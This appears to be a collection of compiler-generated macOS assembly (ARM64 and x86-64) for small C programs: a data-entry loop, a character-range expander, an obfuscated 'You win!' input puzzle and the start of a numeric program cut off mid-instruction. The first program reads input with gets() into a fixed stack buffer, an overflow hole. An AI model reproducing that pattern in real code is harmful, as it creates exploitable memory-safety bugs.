.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #1040 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf add x0, sp, #8 str x0, [sp] ; 8-byte Folded Spill bl _gets ldr x0, [sp] ; 8-byte Folded Reload adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: b LBB0_4 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_4: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: bl ___stack_chk_fail LBB0_6: add sp, sp, #1040 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Programa de Registro de Dados Universal\n" l_.str.1: ; @.str.1 .asciz "Entre com o dado a ser registrador:\n" l_.str.2: ; @.str.2 .asciz "fim" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $1040, %rsp ## imm = 0x410 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf LBB0_1: ## =>This Inner Loop Header: Depth=1 leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq -1040(%rbp), %rdi callq _gets leaq -1040(%rbp), %rdi leaq L_.str.2(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB0_3 ## %bb.2: jmp LBB0_4 LBB0_3: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_4: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_6 ## %bb.5: addq $1040, %rsp ## imm = 0x410 popq %rbp retq LBB0_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Programa de Registro de Dados Universal\n" L_.str.1: ## @.str.1 .asciz "Entre com o dado a ser registrador:\n" L_.str.2: ## @.str.2 .asciz "fim" .subsections_via_symbols
the_stack_data/100139933.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _fill_range ; -- Begin function fill_range .p2align 2 _fill_range: ; @fill_range .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 strb w0, [sp, #47] strb w1, [sp, #46] str x2, [sp, #32] str x3, [sp, #24] ldrsb w8, [sp, #47] ldrsb w9, [sp, #46] subs w8, w8, w9 cset w8, lt and w9, w8, #0x1 mov w8, #-1 ands w9, w9, #0x1 csinc w8, w8, wzr, eq str w8, [sp, #20] ldrsb w8, [sp, #46] ldr w9, [sp, #20] add w8, w8, w9 strb w8, [sp, #19] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldrsb w8, [sp, #47] ldrsb w9, [sp, #19] subs w8, w8, w9 cset w8, eq mov w9, #0 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #24] subs x9, x8, #1 str x9, [sp, #24] subs x8, x8, #1 cset w8, hi str w8, [sp, #12] ; 4-byte Folded Spill b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] ; 4-byte Folded Reload tbz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldrb w8, [sp, #47] ldr x9, [sp, #32] add x10, x9, #1 str x10, [sp, #32] strb w8, [x9] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w9, [sp, #20] ldrsb w8, [sp, #47] add w8, w8, w9 strb w8, [sp, #47] b LBB0_1 LBB0_6: ldr x8, [sp, #32] strb wzr, [x8] ldr x0, [sp, #32] add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _expand ; -- Begin function expand .p2align 2 _expand: ; @expand .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] str x2, [sp, #24] ldur x8, [x29, #-16] ldr x9, [sp, #24] add x8, x8, x9 str x8, [sp, #16] str wzr, [sp, #12] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #8] ; 4-byte Folded Spill tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-16] ldr x9, [sp, #16] subs x8, x8, x9 cset w8, ne str w8, [sp, #8] ; 4-byte Folded Spill b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] ; 4-byte Folded Reload tbz w8, #0, LBB1_10 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] ldrsb w0, [x8, x9] bl _isalnum subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_8 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-8] ldr w9, [sp, #12] add w9, w9, #1 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #45 cset w8, ne tbnz w8, #0, LBB1_8 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-8] ldr w9, [sp, #12] add w9, w9, #2 ldrsb w0, [x8, w9, sxtw] bl _isalnum subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] ldrsb w0, [x8, x9] ldur x8, [x29, #-8] ldr w9, [sp, #12] add w9, w9, #2 ldrsb w1, [x8, w9, sxtw] ldur x2, [x29, #-16] ldr x8, [sp, #16] ldur x9, [x29, #-16] subs x3, x8, x9 bl _fill_range stur x0, [x29, #-16] ldr w8, [sp, #12] add w8, w8, #3 str w8, [sp, #12] b LBB1_9 LBB1_8: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] mov x10, x9 add w10, w10, #1 str w10, [sp, #12] add x8, x8, x9 ldrb w8, [x8] ldur x9, [x29, #-16] add x10, x9, #1 stur x10, [x29, #-16] strb w8, [x9] b LBB1_9 LBB1_9: ; in Loop: Header=BB1_1 Depth=1 b LBB1_1 LBB1_10: ldur x8, [x29, #-16] strb wzr, [x8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #176 .cfi_def_cfa_offset 176 stp x29, x30, [sp, #160] ; 16-byte Folded Spill add x29, sp, #160 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #48] str w0, [sp, #44] str x1, [sp, #32] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF add x1, sp, #52 str x1, [sp, #16] ; 8-byte Folded Spill mov x2, #27 bl _expand ldr x8, [sp, #16] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF str x0, [sp, #24] ; 8-byte Folded Spill bl _printf ldr x1, [sp, #16] ; 8-byte Folded Reload adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF mov x2, #37 bl _expand ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp str x8, [x9] bl _printf ldr x1, [sp, #16] ; 8-byte Folded Reload adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF mov x2, #100 str x2, [sp, #8] ; 8-byte Folded Spill bl _expand ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp str x8, [x9] bl _printf ldr x2, [sp, #8] ; 8-byte Folded Reload ldr x1, [sp, #16] ; 8-byte Folded Reload adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _expand ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp str x8, [x9] bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: bl ___stack_chk_fail LBB2_2: mov w0, #0 ldp x29, x30, [sp, #160] ; 16-byte Folded Reload add sp, sp, #176 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "a-z" l_.str.1: ; @.str.1 .asciz "%s\n" l_.str.2: ; @.str.2 .asciz "9-0A-Z" l_.str.3: ; @.str.3 .asciz "-0-9xA-F%^&Z-" l_.str.4: ; @.str.4 .asciz "a-aa-ba-b-c" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _fill_range ## -- Begin function fill_range .p2align 4, 0x90 _fill_range: ## @fill_range .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movb %sil, %al movb %dil, %sil movb %sil, -1(%rbp) movb %al, -2(%rbp) movq %rdx, -16(%rbp) movq %rcx, -24(%rbp) movsbl -1(%rbp), %edx movsbl -2(%rbp), %esi movl $4294967295, %eax ## imm = 0xFFFFFFFF movl $1, %ecx cmpl %esi, %edx cmovll %ecx, %eax movl %eax, -28(%rbp) movsbl -2(%rbp), %eax addl -28(%rbp), %eax ## kill: def $al killed $al killed $eax movb %al, -29(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movsbl -1(%rbp), %ecx movsbl -29(%rbp), %edx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl %edx, %ecx movb %al, -30(%rbp) ## 1-byte Spill je LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -24(%rbp), %rax movq %rax, %rcx addq $-1, %rcx movq %rcx, -24(%rbp) cmpq $1, %rax seta %al movb %al, -30(%rbp) ## 1-byte Spill LBB0_3: ## in Loop: Header=BB0_1 Depth=1 movb -30(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_4 jmp LBB0_6 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movb -1(%rbp), %cl movq -16(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -16(%rbp) movb %cl, (%rax) ## %bb.5: ## in Loop: Header=BB0_1 Depth=1 movl -28(%rbp), %ecx movsbl -1(%rbp), %eax addl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1(%rbp) jmp LBB0_1 LBB0_6: movq -16(%rbp), %rax movb $0, (%rax) movq -16(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _expand ## -- Begin function expand .p2align 4, 0x90 _expand: ## @expand .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq -16(%rbp), %rax addq -24(%rbp), %rax movq %rax, -32(%rbp) movl $0, -36(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax movslq -36(%rbp), %rcx movsbl (%rax,%rcx), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -37(%rbp) ## 1-byte Spill je LBB1_3 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax cmpq -32(%rbp), %rax setne %al movb %al, -37(%rbp) ## 1-byte Spill LBB1_3: ## in Loop: Header=BB1_1 Depth=1 movb -37(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_4 jmp LBB1_10 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax movslq -36(%rbp), %rcx movsbl (%rax,%rcx), %edi callq _isalnum cmpl $0, %eax je LBB1_8 ## %bb.5: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax movl -36(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $45, %eax jne LBB1_8 ## %bb.6: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax movl -36(%rbp), %ecx addl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %edi callq _isalnum cmpl $0, %eax je LBB1_8 ## %bb.7: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax movslq -36(%rbp), %rcx movb (%rax,%rcx), %sil movq -8(%rbp), %rax movl -36(%rbp), %ecx addl $2, %ecx movslq %ecx, %rcx movb (%rax,%rcx), %al movq -16(%rbp), %rdx movq -32(%rbp), %rcx movq -16(%rbp), %rdi subq %rdi, %rcx movsbl %sil, %edi movsbl %al, %esi callq _fill_range movq %rax, -16(%rbp) movl -36(%rbp), %eax addl $3, %eax movl %eax, -36(%rbp) jmp LBB1_9 LBB1_8: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax movl -36(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -36(%rbp) movslq %ecx, %rcx movb (%rax,%rcx), %cl movq -16(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -16(%rbp) movb %cl, (%rax) LBB1_9: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_1 LBB1_10: movq -16(%rbp), %rax movb $0, (%rax) addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $128, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -116(%rbp) movl %edi, -120(%rbp) movq %rsi, -128(%rbp) leaq -112(%rbp), %rsi leaq L_.str(%rip), %rdi movl $27, %edx callq _expand leaq -112(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq -112(%rbp), %rsi leaq L_.str.2(%rip), %rdi movl $37, %edx callq _expand leaq -112(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq -112(%rbp), %rsi leaq L_.str.3(%rip), %rdi movl $100, %edx callq _expand leaq -112(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq -112(%rbp), %rsi leaq L_.str.4(%rip), %rdi movl $100, %edx callq _expand leaq -112(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_2 ## %bb.1: xorl %eax, %eax addq $128, %rsp popq %rbp retq LBB2_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "a-z" L_.str.1: ## @.str.1 .asciz "%s\n" L_.str.2: ## @.str.2 .asciz "9-0A-Z" L_.str.3: ## @.str.3 .asciz "-0-9xA-F%^&Z-" L_.str.4: ## @.str.4 .asciz "a-aa-ba-b-c" .subsections_via_symbols
the_stack_data/145453185.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _RandomFunc ; -- Begin function RandomFunc .p2align 2 _RandomFunc: ; @RandomFunc .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str x0, [sp, #24] str x1, [sp, #16] ldr x8, [sp, #24] ldr x8, [x8] mov x9, #54700 movk x9, #781, lsl #16 add x8, x8, x9 mov x9, #8426 movk x9, #4194, lsl #16 add x8, x8, x9 stur x8, [x29, #-16] ldur x8, [x29, #-16] lsr x8, x8, #4 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_1 LBB0_1: ldur x8, [x29, #-16] lsr x8, x8, #3 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ldurh w8, [x29, #-16] strh w8, [sp, #14] ldurh w8, [x29, #-10] sturh w8, [x29, #-16] ldrh w8, [sp, #14] sturh w8, [x29, #-10] b LBB0_4 LBB0_3: ldurb w8, [x29, #-16] strb w8, [sp, #13] ldurb w8, [x29, #-15] sturb w8, [x29, #-16] ldrb w8, [sp, #13] sturb w8, [x29, #-15] ldur w8, [x29, #-12] str w8, [sp, #8] ldur w8, [x29, #-16] stur w8, [x29, #-12] ldr w8, [sp, #8] stur w8, [x29, #-16] b LBB0_4 LBB0_4: b LBB0_6 LBB0_5: ldur x9, [x29, #-16] ldur x8, [x29, #-16] add x8, x8, x9 stur x8, [x29, #-16] ldurb w8, [x29, #-14] strb w8, [sp, #7] ldurb w8, [x29, #-16] sturb w8, [x29, #-14] ldrb w8, [sp, #7] sturb w8, [x29, #-16] ldurb w8, [x29, #-15] strb w8, [sp, #7] ldurb w8, [x29, #-10] sturb w8, [x29, #-15] ldrb w8, [sp, #7] sturb w8, [x29, #-10] b LBB0_6 LBB0_6: ldur x8, [x29, #-16] mov x9, #59988 movk x9, #748, lsl #16 subs x8, x8, x9 mov x9, #-61831 movk x9, #64281, lsl #16 add x8, x8, x9 ldr x9, [sp, #16] str x8, [x9] ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: bl ___stack_chk_fail LBB0_8: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _megaInit ; -- Begin function megaInit .p2align 2 _megaInit: ; @megaInit .cfi_startproc ; %bb.0: ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-28] stur w0, [x29, #-32] str x1, [sp, #40] bl _megaInit ldur w8, [x29, #-32] subs w8, w8, #2 cset w8, eq tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: mov x9, sp mov x8, #1 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w0, #-1 bl _exit LBB2_2: b LBB2_3 LBB2_3: str wzr, [sp, #36] b LBB2_4 LBB2_4: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #36] subs w8, w8, #1 cset w8, ge tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_4 Depth=1 ldr x8, [sp, #40] ldr w9, [sp, #36] add w9, w9, #1 ldr x0, [x8, w9, sxtw #3] mov x1, #0 mov w2, #10 bl _strtoul str x0, [sp, #24] ldr x8, [sp, #24] ldrsw x10, [sp, #36] sub x9, x29, #16 str x8, [x9, x10, lsl #3] ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB2_4 LBB2_6: sub x0, x29, #16 sub x1, x29, #24 bl _RandomFunc ldur x8, [x29, #-24] mov x9, #16818 movk x9, #64734, lsl #16 subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_8 b LBB2_7 LBB2_7: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB2_9 LBB2_8: b LBB2_9 LBB2_9: str wzr, [sp, #20] b LBB2_10 LBB2_10: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #1 cset w8, ge tbnz w8, #0, LBB2_12 b LBB2_11 LBB2_11: ; in Loop: Header=BB2_10 Depth=1 ldrsw x9, [sp, #20] sub x8, x29, #24 ldr x8, [x8, x9, lsl #3] mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB2_10 LBB2_12: ldur w8, [x29, #-28] str w8, [sp, #16] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_14 b LBB2_13 LBB2_13: bl ___stack_chk_fail LBB2_14: ldr w0, [sp, #16] ; 4-byte Folded Reload ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Call this program with %i arguments\n" l_.str.1: ; @.str.1 .asciz "You win!\n" l_.str.2: ; @.str.2 .asciz "%lu\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _RandomFunc ## -- Begin function RandomFunc .p2align 4, 0x90 _RandomFunc: ## @RandomFunc .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -24(%rbp) movq %rsi, -32(%rbp) movq -24(%rbp), %rax movq (%rax), %rax addq $51238316, %rax ## imm = 0x30DD5AC addq $274866410, %rax ## imm = 0x106220EA movq %rax, -16(%rbp) movq -16(%rbp), %rax shrq $4, %rax andq $1, %rax cmpq $0, %rax je LBB0_5 ## %bb.1: movq -16(%rbp), %rax shrq $3, %rax andq $1, %rax cmpq $0, %rax je LBB0_3 ## %bb.2: movw -16(%rbp), %ax movw %ax, -34(%rbp) movw -10(%rbp), %ax movw %ax, -16(%rbp) movw -34(%rbp), %ax movw %ax, -10(%rbp) jmp LBB0_4 LBB0_3: movb -16(%rbp), %al movb %al, -35(%rbp) movb -15(%rbp), %al movb %al, -16(%rbp) movb -35(%rbp), %al movb %al, -15(%rbp) movl -12(%rbp), %eax movl %eax, -40(%rbp) movl -16(%rbp), %eax movl %eax, -12(%rbp) movl -40(%rbp), %eax movl %eax, -16(%rbp) LBB0_4: jmp LBB0_6 LBB0_5: movq -16(%rbp), %rax addq -16(%rbp), %rax movq %rax, -16(%rbp) movb -14(%rbp), %al movb %al, -41(%rbp) movb -16(%rbp), %al movb %al, -14(%rbp) movb -41(%rbp), %al movb %al, -16(%rbp) movb -15(%rbp), %al movb %al, -41(%rbp) movb -10(%rbp), %al movb %al, -15(%rbp) movb -41(%rbp), %al movb %al, -10(%rbp) LBB0_6: movq -16(%rbp), %rcx subq $49080916, %rcx ## imm = 0x2ECEA54 addq $-82243975, %rcx ## imm = 0xFB190E79 movq -32(%rbp), %rax movq %rcx, (%rax) movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_8 ## %bb.7: addq $48, %rsp popq %rbp retq LBB0_8: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _megaInit ## -- Begin function megaInit .p2align 4, 0x90 _megaInit: ## @megaInit .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -28(%rbp) movl %edi, -32(%rbp) movq %rsi, -40(%rbp) callq _megaInit cmpl $2, -32(%rbp) je LBB2_2 ## %bb.1: leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $1, %esi callq _printf movl $-1, %edi callq _exit LBB2_2: jmp LBB2_3 LBB2_3: movl $0, -44(%rbp) LBB2_4: ## =>This Inner Loop Header: Depth=1 cmpl $1, -44(%rbp) jge LBB2_6 ## %bb.5: ## in Loop: Header=BB2_4 Depth=1 movq -40(%rbp), %rax movl -44(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movq (%rax,%rcx,8), %rdi xorl %eax, %eax movl %eax, %esi movl $10, %edx callq _strtoul movq %rax, -56(%rbp) movq -56(%rbp), %rcx movslq -44(%rbp), %rax movq %rcx, -16(%rbp,%rax,8) movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB2_4 LBB2_6: leaq -16(%rbp), %rdi leaq -24(%rbp), %rsi callq _RandomFunc movl $4242424242, %eax ## imm = 0xFCDE41B2 cmpq %rax, -24(%rbp) jne LBB2_8 ## %bb.7: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf jmp LBB2_9 LBB2_8: jmp LBB2_9 LBB2_9: movl $0, -60(%rbp) LBB2_10: ## =>This Inner Loop Header: Depth=1 cmpl $1, -60(%rbp) jge LBB2_12 ## %bb.11: ## in Loop: Header=BB2_10 Depth=1 movslq -60(%rbp), %rax movq -24(%rbp,%rax,8), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB2_10 LBB2_12: movl -28(%rbp), %eax movl %eax, -64(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_14 ## %bb.13: movl -64(%rbp), %eax ## 4-byte Reload addq $64, %rsp popq %rbp retq LBB2_14: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Call this program with %i arguments\n" L_.str.1: ## @.str.1 .asciz "You win!\n" L_.str.2: ## @.str.2 .asciz "%lu\n" .subsections_via_symbols
the_stack_data/43887622.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function main lCPI0_0: .quad 0x402921fb4d12d84a ; double 12.5663704 lCPI0_1: .quad 0x400921fb4d12d84a ; double 3.1415926000000001 lCPI0_2: .quad 0x401921fb4d12d84a ; double 6.2831852000000001 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x9, sp sub x8, x29, #4 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf mov x9, sp sub x8, 